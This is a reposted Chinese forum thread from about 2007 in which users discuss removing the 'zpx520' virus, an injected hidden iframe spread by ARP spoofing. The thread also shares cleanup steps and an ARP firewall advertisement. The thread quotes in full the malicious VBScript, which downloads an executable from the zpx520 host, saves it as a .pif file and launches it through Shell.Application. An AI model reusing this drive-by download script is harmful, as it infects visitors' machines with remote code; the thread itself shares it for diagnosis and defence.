主题：[转帖]zpx520病毒如何清除？

zpx520 病毒

在我的流览器中，打开163.com等很多网站查看网页源码都出现这一行。应该是本地劫持放到浏览器中的。<iframe src='http://www.zpx520.com/0.htm' width=0 height=0></iframe>

不管是maxthon还是firefox都是一样的。查看了http://q.zpx520.com/1.htm网站的源码，如下：

<SCRIPT language=VBS>
'1 xiaohui's Script
'2 update 2007.2.24
'1
ps="Begin game ^O^"
'1
On Error Resume Next
'1
https="htt"&"p://"&"w.zpx520.com/0.exe"
'1
pso= "ob"&"je"&"ct"
'1
Set Pj=document.createElement(pso)
'1
Pj.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-11D0-98"&"3A-00C04"&"FC29E36"
'1
Set PS1=Pj.CreateObject("Mic"&"ros"&"oft."&"XML"&"HT"&"TP","")
'1
PS1.Open "G"&"ET", https, False
'1
PS1.Send
'1
ExeName="commomd.pif"
'1
VbsName="run.vbs"
'1
Set PS2=Pj.createobject("Scri"&"p"&"ting.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
'1
Set PS3=PS2.GetSpecialFolder(2)
'1
ExeName=PS2.BuildPath(PS3,ExeName)
'1
VbsName=PS2.BuildPath(PS3,VbsName)
'1
AA="A"&"d"
'1
BB="o"&"d"&"b"&"."&"s"&"tre"&"am"
'1
DC=AA&BB
'1
Set XBOX=Pj.createobject(DC,"")
'1
XBOX.type=1
'1
XBOX.Open
'1
XBOX.Write PS1.ResponseBody
'1
XBOX.Savetofile ExeName,2
'1
XBOX.Close
'1
XBOX.Type=2
'1
XBOX.Open
'1
XBOX.WriteText "Set ws=CreateObject(""Wscript.Shell"")"&vbCrLf&"ws.Run ("""&ExeName&""")"&vbCrLf&"Set ws=Nothing"
'1
XBOX.Savetofile VbsName,2
'1
XBOX.Close
'1
GBA="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"
'1
Set Run=Pj.createobject(GBA&"cation","")
'2
Run.ShellExecute VbsName,"","","Open",0
'3
ps="The end ^O^"
</SCRIPT>

发现了这行，htt"&"p://"&"w.zpx520.com/0.exe

不管打开哪个网站都弹出JS错误信息：

这个病毒真事牛B,如果没补丁的话,其中一台中了,会导致整个局域网内所有电脑中毒,并在交换机上修改所有的ip的mac地址为中毒的mac地址.
本人处理的方法为:
1.有防火墙的或者有路由器的,直接把q.zpx520.com地址给限制访问
2.要求局域网内的都不要访问网页
3.在cmd里面输入arp -a寻找正在连接你电脑的ip地址最好用arp -d清除后在看,好定位哪台中标了
4.关掉或者拔掉网线中标的电脑
5.手动删除所有可疑进程,确保其不在发送报文,病毒好像没绑定感染,可以清除,具体位置不大清楚了
6.打上微软新出的补丁kb925902

困扰好几天了，今天安了AntiARP，终于好了。下面的分析结果时间：2007-5-21 下午 02:39:43IP地址：192.168.0.9MAC地址：00-E0-4C-FE-BE-ED网关IP地址：192.168.0.1网关MAC地址：00-90-D0-84-B9-FF欺骗机MAC地址：00-0A-EB-0D-8F-6F欺骗机IP：未知累计：56***********HTTP://WWW.AntiARP.COM*************时间：2007-5-21 下午 02:43:00IP地址：192.168.0.9MAC地址：00-E0-4C-FE-BE-ED网关IP地址：192.168.0.1网关MAC地址：00-90-D0-84-B9-FF欺骗机MAC地址：00-E0-4C-EE-E9-B0欺骗机IP：未知累计：2343***********HTTP://WWW.AntiARP.COM*************时间：2007-5-21 下午 02:35:34IP地址：192.168.0.9MAC地址：00-E0-4C-FE-BE-ED网关IP地址：192.168.0.1网关MA

你的网络是否经常掉线，是否经常发生IP冲突？
     你是否担心通讯数据受到监控（如MSN、QQ、EMAIL）？
     你的网络速度是否受到网管软件限制（如聚生网管、P2P终结者）？
     你是否深受各种ARP攻击软件之苦（如网络执法官、网络剪刀手、局域网终结者）？

     以上各种问题的根源都是ARP欺骗（ARP攻击）。在没有ARP欺骗之前，数据流向是这样的：网关<->本机。ARP欺骗之后，数据流向是这样的：网关<->攻击者（“网管”）<->本机，本机与网关之间的所有通讯数据都将流经攻击者（“网管”），所以“任人宰割”就在所难免了。

     ARP防火墙通过在系统内核层拦截虚假ARP数据包以及主动通告网关本机正确的MAC地址，可以保障数据流向正确，不经过第三者，从而保证通讯数据安全、保证网络畅通、保证通讯数据不受第三者控制，从而完美的解决上述所有问题。

     ARP防火墙九大功能
     1. 拦截ARP攻击。
        (A) 在系统内核层拦截外部虚假ARP数据包，保障系统不受ARP欺骗、ARP攻击影响，保持网络畅通及通讯安全；
        (B) 在系统内核层拦截本机对外的ARP攻击数据包，以减少感染恶意程序后对外攻击给用户带来的麻烦；
     2. 拦截IP冲突。在系统内核层拦截IP冲突数据包，保障系统不受IP冲突攻击的影响；
     3. Dos攻击抑制。在系统内核层拦截本机对外的TCP SYN/UDP/ICMP/ARP DoS攻击数据包，定位恶意发动DoS攻击的程序，从而保证网络的畅通；
     4. 安全模式。除了网关外，不响应其它机器发送的ARP Request，达到隐身效果，减少受到ARP攻击的几率；
     5. ARP数据分析。分析本机接收到的所有ARP数据包，掌握网络动态，找出潜在的攻击者或中毒的机器；
     6. 监测ARP缓存。自动监测本机ARP缓存表，如发现网关MAC地址被恶意程序篡改，将报警并自动修复，以保持网络畅通及通讯安全；
     7. 主动防御。主动与网关保持通讯，通告网关正确的MAC地址，以保持网络畅通及通讯安全；
     8. 追踪攻击者。发现攻击行为后，自动快速锁定攻击者IP地址；
     9. 查杀ARP病毒。发现本机有对外攻击行为时，自动定位本机感染的恶意程序、病毒程序；

我的网络中此病毒了，不知如何解决！

在安装arp防火墙后，防火墙启动失败，错误代码1/183

虽然安装了arp防火墙，但依然遭受着攻击！

 

最近这些病毒，把我整得

每天都有，不断！

局域网病毒、攻击太厉害了，控制不住！

最近的病毒确实不少